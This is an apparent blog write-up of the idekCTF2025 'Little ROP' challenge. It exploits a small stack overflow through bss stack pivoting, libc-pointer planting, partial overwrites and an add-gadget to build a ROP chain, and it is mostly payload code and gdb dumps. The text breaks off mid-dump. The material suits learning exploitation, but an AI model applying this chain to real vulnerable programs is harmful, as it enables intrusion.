{"id":3921,"date":"2025-08-12T02:48:11","date_gmt":"2025-08-11T17:48:11","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3921"},"modified":"2025-08-12T02:48:12","modified_gmt":"2025-08-11T17:48:12","slug":"idekctf2025-pwn-little-rop-%eb%b8%8c%ed%8f%ac-x-pop-rdi-%ea%b0%99%ec%9d%80-%ea%b0%80%ec%a0%af%ec%9d%b4-%ec%97%86%ec%9d%8c","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3921","title":{"rendered":"[idekCTF2025] pwn\/Little ROP (no brute force, no pop rdi-style gadget)"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@06287c6a0589:~\/study\/idekctf2025\/LittleROP$ checksec .\/chall\n[*] '\/home\/ubuntu\/study\/idekctf2025\/LittleROP\/chall'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">main \/ setup \/ vuln<\/h3>\n\n\n\n<p>Buffering is disabled on <code>stdin<\/code>, <code>stdout<\/code> and <code>stderr<\/code>, and 48 bytes are read via read() into a 32-byte buf.<\/p>\n\n\n\n<p>So there is a buffer overflow, but since the write can run past the buffer by only 16 bytes, only main's RBP and RET can be overwritten.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" 
data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  setup(argc, argv, envp);\n  vuln();\n  return 0;\n}\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void setup()\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n}\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssize_t vuln()\n{\n  _BYTE buf[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  return read(0, buf, 0x30u);\n}\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. 
Overwrite main's RBP with 0x404c00 and main's RET with 0x4011a9<\/h3>\n\n\n\n<p>With the buffer overflow vulnerability, both rbp and ret can be overwritten with any value we want.<\/p>\n\n\n\n<p>Overwrite main's rbp with 0x404c00, an arbitrary address in the bss area, and overwrite main's ret with <strong>0x4011A9, the address right after the function prologue (the highlighted code below).<\/strong><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ vmmap\n...\n**0x00404000         0x00405000         rw-p      \/home\/ubuntu\/study\/idekctf2025\/LittleROP\/chall**\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">**.text:000000000040119D vuln            proc near               ; CODE XREF: main+17\u2193p**\n.text:000000000040119D\n.text:000000000040119D buf             = byte ptr -20h\n.text:000000000040119D\n.text:000000000040119D ; __unwind {\n.text:000000000040119D                 endbr64\n.text:00000000004011A1                 push    rbp\n.text:00000000004011A2                 mov     rbp, rsp\n.text:00000000004011A5                 sub     rsp, 20h\n\nBELOW CODE !!!\n.text:00000000004011A9                 lea     rax, [rbp-20h]\n.text:00000000004011AD                 mov     edx, 30h ; '0'  ; nbytes\n.text:00000000004011B2                 mov     rsi, rax        ; buf\n.text:00000000004011B5                 mov     edi, 0          ; fd\n.text:00000000004011BA                 call    
_read\n.text:00000000004011BF                 nop\n.text:00000000004011C0                 leave\n.text:00000000004011C1                 retn\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">vuln_lea_read = 0x4011a9\nadd_rbp_0x3d_ebx = 0x40113c\n\n# 1. Prepare where to write\npay = b'A'*0x20\npay += p64(0x404c00)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n<p>If a run of A bytes is then sent,<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ip()\ns(b\"A\"*0x30)\n<\/pre>\n\n\n\n<p>the A bytes are written starting at 0x404c00-0x20, because main's rbp was overwritten with 0x404c00, an arbitrary address in the bss area, and read's destination is computed as rbp-0x20.<\/p>\n\n\n\n<p>In other words, since the base pointer was pointed at an arbitrary bss address, the input lands at that address.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/16gx 0x404c00-0x20\n0x404be0:       0x4141414141414141      0x4141414141414141\n0x404bf0:       0x4141414141414141      0x4141414141414141\n0x404c00:       0x4141414141414141      0x4141414141414141\n0x404c10:       0x0000000000000000      0x0000000000000000\n...\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">2. 
Call call_setup to pull libc-related addresses in<\/h3>\n\n\n\n<p>Set the base pointer to 0x404b00 and overwrite the return address with call_setup (0x4011CA, the call to setup inside main). Since the previous step's leave; retn left rsp inside the bss area, setup's calls to setbuf push their return addresses and spill libc pointers there.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.text:00000000004011C2 main            proc near               ; DATA XREF: _start+18\u2191o\n.text:00000000004011C2 ; __unwind {\n.text:00000000004011C2                 endbr64\n.text:00000000004011C6                 push    rbp\n.text:00000000004011C7                 mov     rbp, rsp\n\n**BELOW CODE !!!**\n**.text:00000000004011CA                 mov     eax, 0\n.text:00000000004011CF                 call    setup\n.text:00000000004011D4                 mov     eax, 0\n.text:00000000004011D9                 call    vuln\n.text:00000000004011DE                 mov     eax, 0\n.text:00000000004011E3                 pop     rbp\n.text:00000000004011E4                 retn\n.text:00000000004011E4 ; } \/\/ starts at 4011C2\n\n.text:0000000000401156                 public setup\n.text:0000000000401156 setup           proc near               ; CODE XREF: main+D\u2193p\n.text:0000000000401156 ; __unwind {\n.text:0000000000401156                 endbr64\n.text:000000000040115A                 push    rbp\n.text:000000000040115B                 mov     rbp, rsp\n.text:000000000040115E                 mov     rax, cs:stdin@GLIBC_2_2_5\n.text:0000000000401165                 mov     esi, 0          ; buf\n.text:000000000040116A                 mov     rdi, rax        ; stream\n.text:000000000040116D                 call    _setbuf\n.text:0000000000401172                 mov     rax, cs:stdout@GLIBC_2_2_5\n.text:0000000000401179                 mov     
esi, 0          ; buf\n.text:000000000040117E                 mov     rdi, rax        ; stream\n.text:0000000000401181                 call    _setbuf\n.text:0000000000401186                 mov     rax, cs:stderr@GLIBC_2_2_5\n.text:000000000040118D                 mov     esi, 0          ; buf\n.text:0000000000401192                 mov     rdi, rax        ; stream\n.text:0000000000401195                 call    _setbuf\n.text:000000000040119A                 nop\n.text:000000000040119B                 pop     rbp\n.text:000000000040119C                 retn\n.text:000000000040119C ; } \/\/ starts at 401156**\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># 2. Were libc-related addresses written?\ncall_setup = 0x4011CA\npay = b'A'*0x20\npay += p64(0x404b00)\npay += p64(call_setup)\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n<p>Libc-related addresses starting with 0x7ffff7\u2026 then get written into the arbitrary bss area.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/48gx 0x404b00\n0x404b00:       0x0000000000000000      0x0000000000000000\n0x404b10:       0x0000000000000000      0x0000000000000000\n0x404b20:       0x0000000000000000      0x0000000000000000\n0x404b30:       0x0000000000000000      0x0000000000000000\n0x404b40:       0x0000000000000000      0x0000000000000000\n0x404b50:       0x0000000000000000      0x0000000000000000\n0x404b60:       0x0000000000000000      0x0000000000000000\n0x404b70:       0x0000000000000000      0x00007ffff7fa56a0\n0x404b80:       0x0000000000000000 
     0x00007ffff7e183f5\n0x404b90:       0x0000000000000000      0x00007ffff7fa56a0\n0x404ba0:       0x0000000000000000      0x0000000000000000\n0x404bb0:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404bc0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404bd0:       0x0000000000000000      0x00000000004011bf\n0x404be0:       0x0000000000404c00      0x00007fffffffe198\n0x404bf0:       0x00000000004011c2      0x000000000040119a\n0x404c00:       0x0000000000404b00      0x00000000004011de\n0x404c10:       0x0000000000000000      0x0000000000000000\n0x404c20:       0x0000000000000000      0x0000000000000000\n...\n\n0x00007ffff7d8a000 0x00007ffff7db2000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7db2000 0x00007ffff7f47000 r-xp      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7f47000 0x00007ffff7f9f000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7f9f000 0x00007ffff7fa0000 ---p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7fa0000 0x00007ffff7fa4000 r--p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n0x00007ffff7fa4000 0x00007ffff7fa6000 rw-p      \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">3. Leave more libc-related addresses in the bss area<\/h3>\n\n\n\n<p>Applying the idea from step 2, I wrote a fengshui_libc function so that more libc-related addresses get written into the bss area.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># 3. 
libc fengshui\ndef fengshui_libc():\n    for i in range(5):\n        pay = b'B'*0x20\n        pay += p64(0x404c00+0x70*i)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        pay = b'C'*0x20\n        pay += p64(0x404900)\n        pay += p64(call_setup) #setup\n        s(pay)\n        sleep(0.001)\n\nfengshui_libc()\n<\/pre>\n\n\n\n<p>As the result below shows, far more libc-related addresses are written than before.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/96gx 0x404b00\n0x404b00:       0x0000000000000000      0x0000000000000000\n0x404b10:       0x0000000000000000      0x0000000000000000\n0x404b20:       0x0000000000000000      0x0000000000000000\n0x404b30:       0x0000000000000000      0x0000000000000000\n0x404b40:       0x0000000000000000      0x0000000000000000\n0x404b50:       0x0000000000000000      0x0000000000000000\n0x404b60:       0x0000000000000000      0x0000000000000000\n0x404b70:       0x0000000000000000      0x00007ffff7fa56a0\n0x404b80:       0x0000000000000000      0x00007ffff7e183f5\n0x404b90:       0x0000000000000000      0x00007ffff7fa56a0\n0x404ba0:       0x0000000000000000      0x0000000000000000\n0x404bb0:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404bc0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404bd0:       0x0000000000000000      0x00000000004011bf\n0x404be0:       0x4242424242424242      0x00007ffff7fa56a0\n0x404bf0:       0x0000000000000000      0x00007ffff7e183f5\n0x404c00:       0x0000000000404c70      0x00007ffff7fa56a0\n0x404c10:       0x0000000000000000      0x0000000000000000\n0x404c20:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404c30:       0x00007ffff7fa56a0  
    0x00007ffff7e0b57f\n0x404c40:       0x0000000000000000      0x00000000004011bf\n0x404c50:       0x4242424242424242      0x00007ffff7fa56a0\n0x404c60:       0x0000000000000000      0x00007ffff7e183f5\n0x404c70:       0x0000000000404ce0      0x00007ffff7fa56a0\n0x404c80:       0x0000000000000000      0x0000000000000000\n0x404c90:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404ca0:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404cb0:       0x0000000000000000      0x00000000004011bf\n0x404cc0:       0x4242424242424242      0x00007ffff7fa56a0\n0x404cd0:       0x0000000000000000      0x00007ffff7e183f5\n0x404ce0:       0x0000000000404d50      0x00007ffff7fa56a0\n0x404cf0:       0x0000000000000000      0x0000000000000000\n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x0000000000000000      0x00000000004011bf\n0x404da0:       0x0000000000404dc0      0x00007fffffffe198\n0x404db0:       0x00000000004011c2      0x000000000040119a\n0x404dc0:       0x0000000000404900      0x00000000004011de\n<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">4. 
fengshui_rbp_ret \/ fengshui_ret_rbp trick<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">def fengshui_ret_rbp(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(vuln_lea_read) + p64(0x404a00)) * 2 #what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\ndef fengshui_rbp_ret(base):\n    for i in range(2):\n        #set where to write\n        pay = b'b'*0x20\n        pay += p64(base+i*0x20 + 0x20) #where to where\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n\n        #rbp reset and write\n        pay = (p64(0x404a00) + p64(vuln_lea_read)) * 2 #write to what\n        pay += p64(0x404800 + 0x20)\n        pay += p64(vuln_lea_read)\n        s(pay)\n        sleep(0.001)\n        \n# 0. 
(overwrite rbp), this will be used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n<\/pre>\n\n\n\n<p>I prepared two fengshui functions which, given a base address, repeatedly write 0x404a00 into the RBP slots and 0x4011a9 into the RET slots.<\/p>\n\n\n\n<p>The two functions differ only in the order in which rbp and ret are written.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/32gx 0x404d90-0x10\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x0000000000404a00      0x00000000004011a9\n0x404da0:       0x0000000000404a00      0x00000000004011a9\n0x404db0:       0x0000000000404a00      0x00000000004011a9\n0x404dc0:       0x0000000000404a00      0x00000000004011a9\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n<\/pre>\n\n\n\n<p>Then 0x404d08 + 0x3d (=0x404d45) is set as rbp,<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">pay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d08 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n<\/pre>\n\n\n\n<p>and one byte is changed so that the pop rbx; retn gadget in libc can be used. Changing the low byte of the stored libc address to 0xca turns it into the pop rbx; retn gadget.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/32gx 0x404d00     \n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n0x404d80:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d90:       0x00000000004011a9      0x0000000000404a00\n0x404da0:       0x00000000004011bf      0x0000000000404a00\n0x404db0:       0x00000000004011a9      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       
0x0000000000000000      0x0000000000000000\ngdb-peda$ x\/2i 0x00007ffff7e145ca\n   0x7ffff7e145ca &lt;_IO_new_file_setbuf+42>:     pop    rbx\n   0x7ffff7e145cb &lt;_IO_new_file_setbuf+43>:     ret \n<\/pre>\n\n\n\n<p>Then, to reach the pop rdi gadget, the value 0x3cddc that the &#8220;<code>add [rbp-3Dh], ebx; nop; retn;<\/code>&#8221; gadget will add is written at 0x404d80, an address in the arbitrary bss area.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.text:000000000040113C                 add     [rbp-3Dh], ebx\n.text:000000000040113F                 nop\n.text:0000000000401140\n.text:0000000000401140 locret_401140:                          ; CODE XREF: __do_global_dtors_aux+B\u2191j\n.text:0000000000401140                 retn\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#2. 
set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:00000000000C7389 5F                                      pop     rdi\n# .text:00000000000C738A C3                                      retn\npay = p64(0x3cddc) #rbx value (will be added); 0x8a5ad + 0x3cddc = 0xc7389\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x00007ffff7fa1600      0x00007ffff7e145ad\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404dc0      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n**0x404d80**:       **0x000000000003cddc**      0x00007ffff7e0b57f\n0x404d90:       0x0000000000404a00      0x00000000004011a9\n0x404da0:       0x0000000000404a00      0x00000000004011bf\n0x404db0:       0x0000000000404a00      0x00000000004011a9\n0x404dc0:       0x0000000000404a00      0x00000000004011a9\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n<\/pre>\n\n\n\n<p>The ROP chain is then made to execute the &#8220;<code>add [rbp-3Dh], ebx; nop; retn;<\/code>&#8221; gadget.<\/p>\n\n\n\n<p>As a result, the pop rdi; retn gadget address <strong>0x00007ffff7e51389 gets written at 0x404d08.<\/strong><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#3. set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set gadget address\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x00007ffff7fa1600      **0x00007ffff7e51389**\n0x404d10:       0x00007ffff7fa56a0      0x00007ffff7e0b57f\n0x404d20:       0x0000000000000000      0x00000000004011bf\n0x404d30:       0x4242424242424242      0x00007ffff7fa56a0\n0x404d40:       0x0000000000000000      0x00007ffff7e183f5\n0x404d50:       0x0000000000404d61      0x00007ffff7fa56a0\n0x404d60:       0x0000000000000000      0x0000000000000000\n0x404d70:       0x0000000000404d45      0x00007ffff7e145ca\n0x404d80:       0x000000000003cddc      0x000000000040113c\n0x404d90:       0x00000000004011bf      0x0000000000404a00\n0x404da0:       0x00000000004011a9      0x0000000000404a00\n0x404db0:       0x00000000004011bf      0x0000000000404a00\n0x404dc0:       0x00000000004011a9      0x0000000000404a00\n0x404dd0:       0x0000000000404820      0x00000000004011bf\n0x404de0:       0x0000000000000000      0x0000000000000000\n0x404df0:       0x0000000000000000      0x0000000000000000\n\ngdb-peda$ x\/2i **0x00007ffff7e51389**\n   0x7ffff7e51389 &lt;____wcstoul_l_internal+105>: pop    rdi\n   0x7ffff7e5138a &lt;____wcstoul_l_internal+106>: ret  \n<\/pre>\n\n\n\n<p>Recalling the work done so far, the rest of the ROP chain is built the same way.<\/p>\n\n\n\n<p>This time, 1 is written as the value rdi will be set to (write's first argument),<br>and the &#8220;<code>add [rbp-3Dh], ebx; nop; retn;<\/code>&#8221; gadget is used so that write's address is produced by offset arithmetic.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># set rop again\n# 0. (overwrite rbp), this will be used by \"add    DWORD PTR [rbp-0x3d],ebx\" gadget\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d70+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404d18 + 0x3d) #set rbp\ns(pay)\nsleep(0.001)\n\n# 1. set \"pop rbx; retn;\" gadget (overwrite retn)\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d78+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:000000000008A5CA 5B                                      pop     rbx\n# .text:000000000008A5CB C3                                      retn\npay = p8(0xca) #set gadget\ns(pay)\nsleep(0.001)\n\n#2. set rbx value\nfengshui_rbp_ret(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d80+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# .text:0000000000114870                         write \npay = p64(0x932f1) #rbx value (will be added); 0x8157f + 0x932f1 = 0x114870\ns(pay)\nsleep(0.001)\n\n#3. 
set \"add [rbp-3Dh], ebx; nop; retn;\" gadget\nfengshui_ret_rbp(base=0x404d90)\n\npay = b'c'*0x20\npay += p64(0x404d88+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# set gadget address\npay = p64(add_rbp_0x3d_ebx) #set gadget\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d70) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\n# ip()\ns(pay)\nsleep(0.001)\n\n# rbp that will be used when the \"pop rdi\" gadget runs\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d00+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(0x404a00) \ns(pay)\nsleep(0.001)\n\n# rdi value that will be used when the \"pop rdi\" gadget runs\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'c'*0x20\npay += p64(0x404d10+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(1) #set rdi\ns(pay)\nsleep(0.001)\n\n# set ret\nfengshui_rbp_ret(base=0x404d20)\n\npay = b'd'*0x20\npay += p64(0x404d20+0x20)\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\n# run gg\npay = b'c'*0x20\npay += p64(0x404d00) #set rbp\npay += p64(vuln_lea_read)\ns(pay)\nsleep(0.001)\n\npay = b'a'*0x1\nip()\ns(pay)\nsleep(0.001)\n<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ x\/32gx 0x404d00\n0x404d00:       0x0000000000404a00 &lt;- rbp to be overwritten     0x00007ffff7e51389 &lt;- pop rdi, retn\n0x404d10:       0x0000000000000001 &lt;- rdi value      0x00007ffff7e9e870 &lt;- write function\n0x404d20:       0x00000000004011a9 &lt;- vuln_lea_read     0x00000000004011a9\n0x404d30:       0x0000000000404a00      0x00000000004011a9\n0x404d40:       